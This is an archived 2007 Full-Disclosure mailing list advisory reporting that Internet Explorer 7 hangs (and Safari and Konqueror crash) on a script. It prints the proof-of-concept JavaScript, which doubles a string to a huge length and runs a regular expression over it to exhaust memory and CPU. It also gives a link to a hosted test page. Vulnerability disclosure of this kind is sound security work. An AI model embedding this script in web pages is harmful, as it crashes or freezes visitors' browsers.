[Full-disclosure] Internet Explorer Crash

From: "J. Oquendo" <sil@xxxxxxxxxxxxxxx>
Date: Tue, 17 Apr 2007 13:09:50 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'

I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
while (z.length <= 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z;
var boum = reg.exec(z);

</script>

Goodbye

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC
TCV7FOqA05H8sSDb0r8nSnk=
=J/DW
-----END PGP SIGNATURE-----

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Internet Explorer Crash
  - From: Kradorex Xeron
- Re: [Full-disclosure] Internet Explorer Crash
  - From: Troy
- Re: [Full-disclosure] Internet Explorer Crash
  - From: Nikolay Kichukov

Prev by Date: Re: [Full-disclosure] INVASION OF THE CHILD HACKERS
Next by Date: Re: [Full-disclosure] Internet Explorer Crash
Previous by thread: [Full-disclosure] Tiscali webmail exploited
Next by thread: Re: [Full-disclosure] Internet Explorer Crash
Index(es):
- Date
- Thread

Relevant Pages

Internet Explorer Crash
... Impact: Browser crash possibly more ... Who doesn't know what Internet Explorer and Microsoft are. ... IE 7 is vulnerable to a script which causes the browser to hang. ...
(Bugtraq)
Re: IE Script Error
... After running the 4/11/06 Windows updates from Microsoft I can no ... longer use my Canon Easy-Webprint for Internet Explorer. ... An error has occurred in the script on this page. ...
(microsoft.public.windows.inetexplorer.ie6.browser)
Script error messages
... Amy time I'm on Internet Explorer I keep getting script ... error messages. ... HP says that it is in the microsoft ...
(microsoft.public.windows.inetexplorer.ie6.ieak)
Re: Probable spyware problem
... > when i open the internet explorer, and is causing the google, yahoo ... Microsoft has these suggestions for Protecting your computer from the ... keep it clean,secure and running at its top performance mark. ... I'll mainly work around Windows XP, as that is what the bulk of this ...
(microsoft.public.windowsxp.security_admin)
Re: OWA slow for users to pull up
... Please open the ISA Server management console, ... In the right pane, switch to the 'Logging' tab, make sure the 'Task ... 'Microsoft Firewall' service. ... Open Internet Explorer ...
(microsoft.public.windows.server.sbs)